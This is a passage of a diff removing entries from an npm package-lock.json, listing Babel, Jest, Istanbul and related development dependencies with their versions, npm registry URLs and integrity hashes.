"sha512-uRy78kN4psmji1s2QtbtcCSaj/LILFDp0f/ymhpQH5QY3nljUZCaNWz9X1dEj/8MBdBEFECs7yRhKn8i7NjZgg==", - "dev": true, - "dependencies": { - "@babel/helper-environment-visitor": "^7.18.9", - "@babel/helper-module-imports": "^7.18.6", - "@babel/helper-simple-access": "^7.20.2", - "@babel/helper-split-export-declaration": "^7.18.6", - "@babel/helper-validator-identifier": "^7.19.1", - "@babel/template": "^7.20.7", - "@babel/traverse": "^7.20.10", - "@babel/types": "^7.20.7" - }, - "engines": { - "node": ">=6.9.0" - } - }, - "node_modules/@babel/helper-plugin-utils": { - "version": "7.20.2", - "resolved": "https://registry.npmjs.org/@babel/helper-plugin-utils/-/helper-plugin-utils-7.20.2.tgz", - "integrity": "sha512-8RvlJG2mj4huQ4pZ+rU9lqKi9ZKiRmuvGuM2HlWmkmgOhbs6zEAw6IEiJ5cQqGbDzGZOhwuOQNtZMi/ENLjZoQ==", - "dev": true, - "engines": { - "node": ">=6.9.0" - } - }, - "node_modules/@babel/helper-simple-access": { - "version": "7.20.2", - "resolved": "https://registry.npmjs.org/@babel/helper-simple-access/-/helper-simple-access-7.20.2.tgz", - "integrity": "sha512-+0woI/WPq59IrqDYbVGfshjT5Dmk/nnbdpcF8SnMhhXObpTq2KNBdLFRFrkVdbDOyUmHBCxzm5FHV1rACIkIbA==", - "dev": true, - "dependencies": { - "@babel/types": "^7.20.2" - }, - "engines": { - "node": ">=6.9.0" - } - }, - "node_modules/@babel/helper-split-export-declaration": { - "version": "7.22.6", - "resolved": "https://registry.npmjs.org/@babel/helper-split-export-declaration/-/helper-split-export-declaration-7.22.6.tgz", - "integrity": "sha512-AsUnxuLhRYsisFiaJwvp1QF+I3KjD5FOxut14q/GzovUe6orHLesW2C7d754kRm53h5gqrz6sFl6sxc4BVtE/g==", - "dev": true, - "dependencies": { - "@babel/types": "^7.22.5" - }, - "engines": { - "node": ">=6.9.0" - } - }, - "node_modules/@babel/helper-string-parser": { - "version": "7.22.5", - "resolved": "https://registry.npmjs.org/@babel/helper-string-parser/-/helper-string-parser-7.22.5.tgz", - "integrity": "sha512-mM4COjgZox8U+JcXQwPijIZLElkgEpO5rsERVDJTc2qfCDfERyob6k5WegS14SX18IIjv+XD+GrqNumY5JRCDw==", - "dev": true, - "engines": { - "node": ">=6.9.0" - } - }, - "node_modules/@babel/helper-validator-identifier": { - "version": "7.22.20", - "resolved": "https://registry.npmjs.org/@babel/helper-validator-identifier/-/helper-validator-identifier-7.22.20.tgz", - "integrity": "sha512-Y4OZ+ytlatR8AI+8KZfKuL5urKp7qey08ha31L8b3BwewJAoJamTzyvxPR/5D+KkdJCGPq/+8TukHBlY10FX9A==", - "dev": true, - "engines": { - "node": ">=6.9.0" - } - }, - "node_modules/@babel/helper-validator-option": { - "version": "7.18.6", - "resolved": "https://registry.npmjs.org/@babel/helper-validator-option/-/helper-validator-option-7.18.6.tgz", - "integrity": "sha512-XO7gESt5ouv/LRJdrVjkShckw6STTaB7l9BrpBaAHDeF5YZT+01PCwmR0SJHnkW6i8OwW/EVWRShfi4j2x+KQw==", - "dev": true, - "engines": { - "node": ">=6.9.0" - } - }, - "node_modules/@babel/helpers": { - "version": "7.20.13", - "resolved": "https://registry.npmjs.org/@babel/helpers/-/helpers-7.20.13.tgz", - "integrity": "sha512-nzJ0DWCL3gB5RCXbUO3KIMMsBY2Eqbx8mBpKGE/02PgyRQFcPQLbkQ1vyy596mZLaP+dAfD+R4ckASzNVmW3jg==", - "dev": true, - "dependencies": { - "@babel/template": "^7.20.7", - "@babel/traverse": "^7.20.13", - "@babel/types": "^7.20.7" - }, - "engines": { - "node": ">=6.9.0" - } - }, - "node_modules/@babel/highlight": { - "version": "7.22.20", - "resolved": "https://registry.npmjs.org/@babel/highlight/-/highlight-7.22.20.tgz", - "integrity": "sha512-dkdMCN3py0+ksCgYmGG8jKeGA/8Tk+gJwSYYlFGxG5lmhfKNoAy004YpLxpS1W2J8m/EK2Ew+yOs9pVRwO89mg==", - "dev": true, - "dependencies": { - "@babel/helper-validator-identifier": "^7.22.20", - "chalk": "^2.4.2", - "js-tokens": "^4.0.0" - }, - "engines": { - "node": ">=6.9.0" - } - }, - "node_modules/@babel/highlight/node_modules/ansi-styles": { - "version": "3.2.1", - "resolved": "https://registry.npmjs.org/ansi-styles/-/ansi-styles-3.2.1.tgz", - "integrity": "sha512-VT0ZI6kZRdTh8YyJw3SMbYm/u+NqfsAxEpWO0Pf9sq8/e94WxxOpPKx9FR1FlyCtOVDNOQ+8ntlqFxiRc+r5qA==", - "dev": true, - "dependencies": { - "color-convert": "^1.9.0" - }, - "engines": { - "node": ">=4" - } - }, - "node_modules/@babel/highlight/node_modules/chalk": { - "version": "2.4.2", - "resolved": "https://registry.npmjs.org/chalk/-/chalk-2.4.2.tgz", - "integrity": "sha512-Mti+f9lpJNcwF4tWV8/OrTTtF1gZi+f8FqlyAdouralcFWFQWF2+NgCHShjkCb+IFBLq9buZwE1xckQU4peSuQ==", - "dev": true, - "dependencies": { - "ansi-styles": "^3.2.1", - "escape-string-regexp": "^1.0.5", - "supports-color": "^5.3.0" - }, - "engines": { - "node": ">=4" - } - }, - "node_modules/@babel/highlight/node_modules/color-convert": { - "version": "1.9.3", - "resolved": "https://registry.npmjs.org/color-convert/-/color-convert-1.9.3.tgz", - "integrity": "sha512-QfAUtd+vFdAtFQcC8CCyYt1fYWxSqAiK2cSD6zDB8N3cpsEBAvRxp9zOGg6G/SHHJYAT88/az/IuDGALsNVbGg==", - "dev": true, - "dependencies": { - "color-name": "1.1.3" - } - }, - "node_modules/@babel/highlight/node_modules/color-name": { - "version": "1.1.3", - "resolved": "https://registry.npmjs.org/color-name/-/color-name-1.1.3.tgz", - "integrity": "sha512-72fSenhMw2HZMTVHeCA9KCmpEIbzWiQsjN+BHcBbS9vr1mtt+vJjPdksIBNUmKAW8TFUDPJK5SUU3QhE9NEXDw==", - "dev": true - }, - "node_modules/@babel/highlight/node_modules/escape-string-regexp": { - "version": "1.0.5", - "resolved": "https://registry.npmjs.org/escape-string-regexp/-/escape-string-regexp-1.0.5.tgz", - "integrity": "sha512-vbRorB5FUQWvla16U8R/qgaFIya2qGzwDrNmCZuYKrbdSUMG6I1ZCGQRefkRVhuOkIGVne7BQ35DSfo1qvJqFg==", - "dev": true, - "engines": { - "node": ">=0.8.0" - } - }, - "node_modules/@babel/highlight/node_modules/has-flag": { - "version": "3.0.0", - "resolved": "https://registry.npmjs.org/has-flag/-/has-flag-3.0.0.tgz", - "integrity": "sha512-sKJf1+ceQBr4SMkvQnBDNDtf4TXpVhVGateu0t918bl30FnbE2m4vNLX+VWe/dpjlb+HugGYzW7uQXH98HPEYw==", - "dev": true, - "engines": { - "node": ">=4" - } - }, - "node_modules/@babel/highlight/node_modules/supports-color": { - "version": "5.5.0", - "resolved": "https://registry.npmjs.org/supports-color/-/supports-color-5.5.0.tgz", - "integrity": "sha512-QjVjwdXIt408MIiAqCX4oUKsgU2EqAGzs2Ppkm4aQYbjm+ZEWEcW4SfFNTr4uMNZma0ey4f5lgLrkB0aX0QMow==", - "dev": true, - "dependencies": { - "has-flag": "^3.0.0" - }, - "engines": { - "node": ">=4" - } - }, - "node_modules/@babel/parser": { - "version": "7.23.0", - "resolved": "https://registry.npmjs.org/@babel/parser/-/parser-7.23.0.tgz", - "integrity": "sha512-vvPKKdMemU85V9WE/l5wZEmImpCtLqbnTvqDS2U1fJ96KrxoW7KrXhNsNCblQlg8Ck4b85yxdTyelsMUgFUXiw==", - "dev": true, - "bin": { - "parser": "bin/babel-parser.js" - }, - "engines": { - "node": ">=6.0.0" - } - }, - "node_modules/@babel/plugin-syntax-async-generators": { - "version": "7.8.4", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-async-generators/-/plugin-syntax-async-generators-7.8.4.tgz", - "integrity": "sha512-tycmZxkGfZaxhMRbXlPXuVFpdWlXpir2W4AMhSJgRKzk/eDlIXOhb2LHWoLpDF7TEHylV5zNhykX6KAgHJmTNw==", - "dev": true, - "dependencies": { - "@babel/helper-plugin-utils": "^7.8.0" - }, - "peerDependencies": { - "@babel/core": "^7.0.0-0" - } - }, - "node_modules/@babel/plugin-syntax-bigint": { - "version": "7.8.3", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-bigint/-/plugin-syntax-bigint-7.8.3.tgz", - "integrity": "sha512-wnTnFlG+YxQm3vDxpGE57Pj0srRU4sHE/mDkt1qv2YJJSeUAec2ma4WLUnUPeKjyrfntVwe/N6dCXpU+zL3Npg==", - "dev": true, - "dependencies": { - "@babel/helper-plugin-utils": "^7.8.0" - }, - "peerDependencies": { - "@babel/core": "^7.0.0-0" - } - }, - "node_modules/@babel/plugin-syntax-class-properties": { - "version": "7.12.13", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-class-properties/-/plugin-syntax-class-properties-7.12.13.tgz", - "integrity": "sha512-fm4idjKla0YahUNgFNLCB0qySdsoPiZP3iQE3rky0mBUtMZ23yDJ9SJdg6dXTSDnulOVqiF3Hgr9nbXvXTQZYA==", - "dev": true, - "dependencies": { - "@babel/helper-plugin-utils": "^7.12.13" - }, - "peerDependencies": { - "@babel/core": "^7.0.0-0" - } - }, - "node_modules/@babel/plugin-syntax-import-meta": { - "version": "7.10.4", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-import-meta/-/plugin-syntax-import-meta-7.10.4.tgz", - "integrity": "sha512-Yqfm+XDx0+Prh3VSeEQCPU81yC+JWZ2pDPFSS4ZdpfZhp4MkFMaDC1UqseovEKwSUpnIL7+vK+Clp7bfh0iD7g==", - "dev": true, - "dependencies": { - "@babel/helper-plugin-utils": "^7.10.4" - }, - "peerDependencies": { - "@babel/core": "^7.0.0-0" - } - }, - "node_modules/@babel/plugin-syntax-json-strings": { - "version": "7.8.3", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-json-strings/-/plugin-syntax-json-strings-7.8.3.tgz", - "integrity": "sha512-lY6kdGpWHvjoe2vk4WrAapEuBR69EMxZl+RoGRhrFGNYVK8mOPAW8VfbT/ZgrFbXlDNiiaxQnAtgVCZ6jv30EA==", - "dev": true, - "dependencies": { - "@babel/helper-plugin-utils": "^7.8.0" - }, - "peerDependencies": { - "@babel/core": "^7.0.0-0" - } - }, - "node_modules/@babel/plugin-syntax-jsx": { - "version": "7.18.6", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-jsx/-/plugin-syntax-jsx-7.18.6.tgz", - "integrity": "sha512-6mmljtAedFGTWu2p/8WIORGwy+61PLgOMPOdazc7YoJ9ZCWUyFy3A6CpPkRKLKD1ToAesxX8KGEViAiLo9N+7Q==", - "dev": true, - "dependencies": { - "@babel/helper-plugin-utils": "^7.18.6" - }, - "engines": { - "node": ">=6.9.0" - }, - "peerDependencies": { - "@babel/core": "^7.0.0-0" - } - }, - "node_modules/@babel/plugin-syntax-logical-assignment-operators": { - "version": "7.10.4", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-logical-assignment-operators/-/plugin-syntax-logical-assignment-operators-7.10.4.tgz", - "integrity": "sha512-d8waShlpFDinQ5MtvGU9xDAOzKH47+FFoney2baFIoMr952hKOLp1HR7VszoZvOsV/4+RRszNY7D17ba0te0ig==", - "dev": true, - "dependencies": { - "@babel/helper-plugin-utils": "^7.10.4" - }, - "peerDependencies": { - "@babel/core": "^7.0.0-0" - } - }, - "node_modules/@babel/plugin-syntax-nullish-coalescing-operator": { - "version": "7.8.3", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-nullish-coalescing-operator/-/plugin-syntax-nullish-coalescing-operator-7.8.3.tgz", - "integrity": "sha512-aSff4zPII1u2QD7y+F8oDsz19ew4IGEJg9SVW+bqwpwtfFleiQDMdzA/R+UlWDzfnHFCxxleFT0PMIrR36XLNQ==", - "dev": true, - "dependencies": { - "@babel/helper-plugin-utils": "^7.8.0" - }, - "peerDependencies": { - "@babel/core": "^7.0.0-0" - } - }, - "node_modules/@babel/plugin-syntax-numeric-separator": { - "version": "7.10.4", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-numeric-separator/-/plugin-syntax-numeric-separator-7.10.4.tgz", - "integrity": "sha512-9H6YdfkcK/uOnY/K7/aA2xpzaAgkQn37yzWUMRK7OaPOqOpGS1+n0H5hxT9AUw9EsSjPW8SVyMJwYRtWs3X3ug==", - "dev": true, - "dependencies": { - "@babel/helper-plugin-utils": "^7.10.4" - }, - "peerDependencies": { - "@babel/core": "^7.0.0-0" - } - }, - "node_modules/@babel/plugin-syntax-object-rest-spread": { - "version": "7.8.3", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-object-rest-spread/-/plugin-syntax-object-rest-spread-7.8.3.tgz", - "integrity": "sha512-XoqMijGZb9y3y2XskN+P1wUGiVwWZ5JmoDRwx5+3GmEplNyVM2s2Dg8ILFQm8rWM48orGy5YpI5Bl8U1y7ydlA==", - "dev": true, - "dependencies": { - "@babel/helper-plugin-utils": "^7.8.0" - }, - "peerDependencies": { - "@babel/core": "^7.0.0-0" - } - }, - "node_modules/@babel/plugin-syntax-optional-catch-binding": { - "version": "7.8.3", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-optional-catch-binding/-/plugin-syntax-optional-catch-binding-7.8.3.tgz", - "integrity": "sha512-6VPD0Pc1lpTqw0aKoeRTMiB+kWhAoT24PA+ksWSBrFtl5SIRVpZlwN3NNPQjehA2E/91FV3RjLWoVTglWcSV3Q==", - "dev": true, - "dependencies": { - "@babel/helper-plugin-utils": "^7.8.0" - }, - "peerDependencies": { - "@babel/core": "^7.0.0-0" - } - }, - "node_modules/@babel/plugin-syntax-optional-chaining": { - "version": "7.8.3", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-optional-chaining/-/plugin-syntax-optional-chaining-7.8.3.tgz", - "integrity": "sha512-KoK9ErH1MBlCPxV0VANkXW2/dw4vlbGDrFgz8bmUsBGYkFRcbRwMh6cIJubdPrkxRwuGdtCk0v/wPTKbQgBjkg==", - "dev": true, - "dependencies": { - "@babel/helper-plugin-utils": "^7.8.0" - }, - "peerDependencies": { - "@babel/core": "^7.0.0-0" - } - }, - "node_modules/@babel/plugin-syntax-top-level-await": { - "version": "7.14.5", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-top-level-await/-/plugin-syntax-top-level-await-7.14.5.tgz", - "integrity": "sha512-hx++upLv5U1rgYfwe1xBQUhRmU41NEvpUvrp8jkrSCdvGSnM5/qdRMtylJ6PG5OFkBaHkbTAKTnd3/YyESRHFw==", - "dev": true, - "dependencies": { - "@babel/helper-plugin-utils": "^7.14.5" - }, - "engines": { - "node": ">=6.9.0" - }, - "peerDependencies": { - "@babel/core": "^7.0.0-0" - } - }, - "node_modules/@babel/plugin-syntax-typescript": { - "version": "7.20.0", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-typescript/-/plugin-syntax-typescript-7.20.0.tgz", - "integrity": "sha512-rd9TkG+u1CExzS4SM1BlMEhMXwFLKVjOAFFCDx9PbX5ycJWDoWMcwdJH9RhkPu1dOgn5TrxLot/Gx6lWFuAUNQ==", - "dev": true, - "dependencies": { - "@babel/helper-plugin-utils": "^7.19.0" - }, - "engines": { - "node": ">=6.9.0" - }, - "peerDependencies": { - "@babel/core": "^7.0.0-0" - } - }, - "node_modules/@babel/template": { - "version": "7.22.15", - "resolved": "https://registry.npmjs.org/@babel/template/-/template-7.22.15.tgz", - "integrity": "sha512-QPErUVm4uyJa60rkI73qneDacvdvzxshT3kksGqlGWYdOTIUOwJ7RDUL8sGqslY1uXWSL6xMFKEXDS3ox2uF0w==", - "dev": true, - "dependencies": { - "@babel/code-frame": "^7.22.13", - "@babel/parser": "^7.22.15", - "@babel/types": "^7.22.15" - }, - "engines": { - "node": ">=6.9.0" - } - }, - "node_modules/@babel/traverse": { - "version": "7.23.2", - "resolved": "https://registry.npmjs.org/@babel/traverse/-/traverse-7.23.2.tgz", - "integrity": "sha512-azpe59SQ48qG6nu2CzcMLbxUudtN+dOM9kDbUqGq3HXUJRlo7i8fvPoxQUzYgLZ4cMVmuZgm8vvBpNeRhd6XSw==", - "dev": true, - "dependencies": { - "@babel/code-frame": "^7.22.13", - "@babel/generator": "^7.23.0", - "@babel/helper-environment-visitor": "^7.22.20", - "@babel/helper-function-name": "^7.23.0", - "@babel/helper-hoist-variables": "^7.22.5", - "@babel/helper-split-export-declaration": "^7.22.6", - "@babel/parser": "^7.23.0", - "@babel/types": "^7.23.0", - "debug": "^4.1.0", - "globals": "^11.1.0" - }, - "engines": { - "node": ">=6.9.0" - } - }, - "node_modules/@babel/types": { - "version": "7.23.0", - "resolved": "https://registry.npmjs.org/@babel/types/-/types-7.23.0.tgz", - "integrity": "sha512-0oIyUfKoI3mSqMvsxBdclDwxXKXAUA8v/apZbc+iSyARYou1o8ZGDxbUYyLFoW2arqS2jDGqJuZvv1d/io1axg==", - "dev": true, - "dependencies": { - "@babel/helper-string-parser": "^7.22.5", - "@babel/helper-validator-identifier": "^7.22.20", - "to-fast-properties": "^2.0.0" - }, - "engines": { - "node": ">=6.9.0" - } - }, - "node_modules/@bcoe/v8-coverage": { - "version": "0.2.3", - "resolved": "https://registry.npmjs.org/@bcoe/v8-coverage/-/v8-coverage-0.2.3.tgz", - "integrity": "sha512-0hYQ8SB4Db5zvZB4axdMHGwEaQjkZzFjQiN9LVYvIFB2nSUHW9tYpxWriPrWDASIxiaXax83REcLxuSdnGPZtw==", - "dev": true - }, - "node_modules/@istanbuljs/load-nyc-config": { - "version": "1.1.0", - "resolved": "https://registry.npmjs.org/@istanbuljs/load-nyc-config/-/load-nyc-config-1.1.0.tgz", - "integrity": "sha512-VjeHSlIzpv/NyD3N0YuHfXOPDIixcA1q2ZV98wsMqcYlPmv2n3Yb2lYP9XMElnaFVXg5A7YLTeLu6V84uQDjmQ==", - "dev": true, - "dependencies": { - "camelcase": "^5.3.1", - "find-up": "^4.1.0", - "get-package-type": "^0.1.0", - "js-yaml": "^3.13.1", - "resolve-from": "^5.0.0" - }, - "engines": { - "node": ">=8" - } - }, - "node_modules/@istanbuljs/schema": { - "version": "0.1.3", - "resolved": "https://registry.npmjs.org/@istanbuljs/schema/-/schema-0.1.3.tgz", - "integrity": "sha512-ZXRY4jNvVgSVQ8DL3LTcakaAtXwTVUxE81hslsyD2AtoXW/wVob10HkOJ1X/pAlcI7D+2YoZKg5do8G/w6RYgA==", - "dev": true, - "engines": { - "node": ">=8" - } - }, - "node_modules/@jest/console": { - "version": "29.4.1", - "resolved": "https://registry.npmjs.org/@jest/console/-/console-29.4.1.tgz", - "integrity": "sha512-m+XpwKSi3PPM9znm5NGS8bBReeAJJpSkL1OuFCqaMaJL2YX9YXLkkI+MBchMPwu+ZuM2rynL51sgfkQteQ1CKQ==", - "dev": true, - "dependencies": { - "@jest/types": "^29.4.1", - "@types/node": "*", - "chalk": "^4.0.0", - "jest-message-util": "^29.4.1", - "jest-util": "^29.4.1", - "slash": "^3.0.0" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/@jest/core": { - "version": "29.4.1", - "resolved": "https://registry.npmjs.org/@jest/core/-/core-29.4.1.tgz", - "integrity": "sha512-RXFTohpBqpaTebNdg5l3I5yadnKo9zLBajMT0I38D0tDhreVBYv3fA8kywthI00sWxPztWLD3yjiUkewwu/wKA==", - "dev": true, - "dependencies": { - "@jest/console": "^29.4.1", - "@jest/reporters": "^29.4.1", - "@jest/test-result": "^29.4.1", - "@jest/transform": "^29.4.1", - "@jest/types": "^29.4.1", - "@types/node": "*", - "ansi-escapes": "^4.2.1", - "chalk": "^4.0.0", - "ci-info": "^3.2.0", - "exit": "^0.1.2", - "graceful-fs": "^4.2.9", - "jest-changed-files": "^29.4.0", - "jest-config": "^29.4.1", - "jest-haste-map": "^29.4.1", - "jest-message-util": "^29.4.1", - "jest-regex-util": "^29.2.0", - "jest-resolve": "^29.4.1", - "jest-resolve-dependencies": "^29.4.1", - "jest-runner": "^29.4.1", - "jest-runtime": "^29.4.1", - "jest-snapshot": "^29.4.1", - "jest-util": "^29.4.1", - "jest-validate": "^29.4.1", - "jest-watcher": "^29.4.1", - "micromatch": "^4.0.4", - "pretty-format": "^29.4.1", - "slash": "^3.0.0", - "strip-ansi": "^6.0.0" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - }, - "peerDependencies": { - "node-notifier": "^8.0.1 || ^9.0.0 || ^10.0.0" - }, - "peerDependenciesMeta": { - "node-notifier": { - "optional": true - } - } - }, - "node_modules/@jest/environment": { - "version": "29.4.1", - "resolved": "https://registry.npmjs.org/@jest/environment/-/environment-29.4.1.tgz", - "integrity": "sha512-pJ14dHGSQke7Q3mkL/UZR9ZtTOxqskZaC91NzamEH4dlKRt42W+maRBXiw/LWkdJe+P0f/zDR37+SPMplMRlPg==", - "dev": true, - "dependencies": { - "@jest/fake-timers": "^29.4.1", - "@jest/types": "^29.4.1", - "@types/node": "*", - "jest-mock": "^29.4.1" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/@jest/expect": { - "version": "29.4.1", - "resolved": "https://registry.npmjs.org/@jest/expect/-/expect-29.4.1.tgz", - "integrity": "sha512-ZxKJP5DTUNF2XkpJeZIzvnzF1KkfrhEF6Rz0HGG69fHl6Bgx5/GoU3XyaeFYEjuuKSOOsbqD/k72wFvFxc3iTw==", - "dev": true, - "dependencies": { - "expect": "^29.4.1", - "jest-snapshot": "^29.4.1" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/@jest/expect-utils": { - "version": "29.4.1", - "resolved": "https://registry.npmjs.org/@jest/expect-utils/-/expect-utils-29.4.1.tgz", - "integrity": "sha512-w6YJMn5DlzmxjO00i9wu2YSozUYRBhIoJ6nQwpMYcBMtiqMGJm1QBzOf6DDgRao8dbtpDoaqLg6iiQTvv0UHhQ==", - "dev": true, - "dependencies": { - "jest-get-type": "^29.2.0" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/@jest/fake-timers": { - "version": "29.4.1", - "resolved": "https://registry.npmjs.org/@jest/fake-timers/-/fake-timers-29.4.1.tgz", - "integrity": "sha512-/1joI6rfHFmmm39JxNfmNAO3Nwm6Y0VoL5fJDy7H1AtWrD1CgRtqJbN9Ld6rhAkGO76qqp4cwhhxJ9o9kYjQMw==", - "dev": true, - "dependencies": { - "@jest/types": "^29.4.1", - "@sinonjs/fake-timers": "^10.0.2", - "@types/node": "*", - "jest-message-util": "^29.4.1", - "jest-mock": "^29.4.1", - "jest-util": "^29.4.1" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/@jest/globals": { - "version": "29.4.1", - "resolved": "https://registry.npmjs.org/@jest/globals/-/globals-29.4.1.tgz", - "integrity": "sha512-znoK2EuFytbHH0ZSf2mQK2K1xtIgmaw4Da21R2C/NE/+NnItm5mPEFQmn8gmF3f0rfOlmZ3Y3bIf7bFj7DHxAA==", - "dev": true, - "dependencies": { - "@jest/environment": "^29.4.1", - "@jest/expect": "^29.4.1", - "@jest/types": "^29.4.1", - "jest-mock": "^29.4.1" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/@jest/reporters": { - "version": "29.4.1", - "resolved": "https://registry.npmjs.org/@jest/reporters/-/reporters-29.4.1.tgz", - "integrity": "sha512-AISY5xpt2Xpxj9R6y0RF1+O6GRy9JsGa8+vK23Lmzdy1AYcpQn5ItX79wJSsTmfzPKSAcsY1LNt/8Y5Xe5LOSg==", - "dev": true, - "dependencies": { - "@bcoe/v8-coverage": "^0.2.3", - "@jest/console": "^29.4.1", - "@jest/test-result": "^29.4.1", - "@jest/transform": "^29.4.1", - "@jest/types": "^29.4.1", - "@jridgewell/trace-mapping": "^0.3.15", - "@types/node": "*", - "chalk": "^4.0.0", - "collect-v8-coverage": "^1.0.0", - "exit": "^0.1.2", - "glob": "^7.1.3", - "graceful-fs": "^4.2.9", - "istanbul-lib-coverage": "^3.0.0", - "istanbul-lib-instrument": "^5.1.0", - "istanbul-lib-report": "^3.0.0", - "istanbul-lib-source-maps": "^4.0.0", - "istanbul-reports": "^3.1.3", - "jest-message-util": "^29.4.1", - "jest-util": "^29.4.1", - "jest-worker": "^29.4.1", - "slash": "^3.0.0", - "string-length": "^4.0.1", - "strip-ansi": "^6.0.0", - "v8-to-istanbul": "^9.0.1" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - }, - "peerDependencies": { - "node-notifier": "^8.0.1 || ^9.0.0 || ^10.0.0" - }, - "peerDependenciesMeta": { - "node-notifier": { - "optional": true - } - } - }, - "node_modules/@jest/schemas": { - "version": "29.4.0", - "resolved": "https://registry.npmjs.org/@jest/schemas/-/schemas-29.4.0.tgz", - "integrity": "sha512-0E01f/gOZeNTG76i5eWWSupvSHaIINrTie7vCyjiYFKgzNdyEGd12BUv4oNBFHOqlHDbtoJi3HrQ38KCC90NsQ==", - "dev": true, - "dependencies": { - "@sinclair/typebox": "^0.25.16" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/@jest/source-map": { - "version": "29.2.0", - "resolved": "https://registry.npmjs.org/@jest/source-map/-/source-map-29.2.0.tgz", - "integrity": "sha512-1NX9/7zzI0nqa6+kgpSdKPK+WU1p+SJk3TloWZf5MzPbxri9UEeXX5bWZAPCzbQcyuAzubcdUHA7hcNznmRqWQ==", - "dev": true, - "dependencies": { - "@jridgewell/trace-mapping": "^0.3.15", - "callsites": "^3.0.0", - "graceful-fs": "^4.2.9" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/@jest/test-result": { - "version": "29.4.1", - "resolved": "https://registry.npmjs.org/@jest/test-result/-/test-result-29.4.1.tgz", - "integrity": "sha512-WRt29Lwt+hEgfN8QDrXqXGgCTidq1rLyFqmZ4lmJOpVArC8daXrZWkWjiaijQvgd3aOUj2fM8INclKHsQW9YyQ==", - "dev": true, - "dependencies": { - "@jest/console": "^29.4.1", - "@jest/types": "^29.4.1", - "@types/istanbul-lib-coverage": "^2.0.0", - "collect-v8-coverage": "^1.0.0" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/@jest/test-sequencer": { - "version": "29.4.1", - "resolved": "https://registry.npmjs.org/@jest/test-sequencer/-/test-sequencer-29.4.1.tgz", - "integrity": "sha512-v5qLBNSsM0eHzWLXsQ5fiB65xi49A3ILPSFQKPXzGL4Vyux0DPZAIN7NAFJa9b4BiTDP9MBF/Zqc/QA1vuiJ0w==", - "dev": true, - "dependencies": { - "@jest/test-result": "^29.4.1", - "graceful-fs": "^4.2.9", - "jest-haste-map": "^29.4.1", - "slash": "^3.0.0" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/@jest/transform": { - "version": "29.4.1", - "resolved": "https://registry.npmjs.org/@jest/transform/-/transform-29.4.1.tgz", - "integrity": "sha512-5w6YJrVAtiAgr0phzKjYd83UPbCXsBRTeYI4BXokv9Er9CcrH9hfXL/crCvP2d2nGOcovPUnlYiLPFLZrkG5Hg==", - "dev": true, - "dependencies": { - "@babel/core": "^7.11.6", - "@jest/types": "^29.4.1", - "@jridgewell/trace-mapping": "^0.3.15", - "babel-plugin-istanbul": "^6.1.1", - "chalk": "^4.0.0", - "convert-source-map": "^2.0.0", - "fast-json-stable-stringify": "^2.1.0", - "graceful-fs": "^4.2.9", - "jest-haste-map": "^29.4.1", - "jest-regex-util": "^29.2.0", - "jest-util": "^29.4.1", - "micromatch": "^4.0.4", - "pirates": "^4.0.4", - "slash": "^3.0.0", - "write-file-atomic": "^5.0.0" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/@jest/types": { - "version": "29.4.1", - "resolved": "https://registry.npmjs.org/@jest/types/-/types-29.4.1.tgz", - "integrity": "sha512-zbrAXDUOnpJ+FMST2rV7QZOgec8rskg2zv8g2ajeqitp4tvZiyqTCYXANrKsM+ryj5o+LI+ZN2EgU9drrkiwSA==", - "dev": true, - "dependencies": { - "@jest/schemas": "^29.4.0", - "@types/istanbul-lib-coverage": "^2.0.0", - "@types/istanbul-reports": "^3.0.0", - "@types/node": "*", - "@types/yargs": "^17.0.8", - "chalk": "^4.0.0" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/@jridgewell/gen-mapping": { - "version": "0.1.1", - "resolved": "https://registry.npmjs.org/@jridgewell/gen-mapping/-/gen-mapping-0.1.1.tgz", - "integrity": "sha512-sQXCasFk+U8lWYEe66WxRDOE9PjVz4vSM51fTu3Hw+ClTpUSQb718772vH3pyS5pShp6lvQM7SxgIDXXXmOX7w==", - "dev": true, - "dependencies": { - "@jridgewell/set-array": "^1.0.0", - "@jridgewell/sourcemap-codec": "^1.4.10" - }, - "engines": { - "node": ">=6.0.0" - } - }, - "node_modules/@jridgewell/resolve-uri": { - "version": "3.1.0", - "resolved": "https://registry.npmjs.org/@jridgewell/resolve-uri/-/resolve-uri-3.1.0.tgz", - "integrity": "sha512-F2msla3tad+Mfht5cJq7LSXcdudKTWCVYUgw6pLFOOHSTtZlj6SWNYAp+AhuqLmWdBO2X5hPrLcu8cVP8fy28w==", - "dev": true, - "engines": { - "node": ">=6.0.0" - } - }, - "node_modules/@jridgewell/set-array": { - "version": "1.1.2", - "resolved": 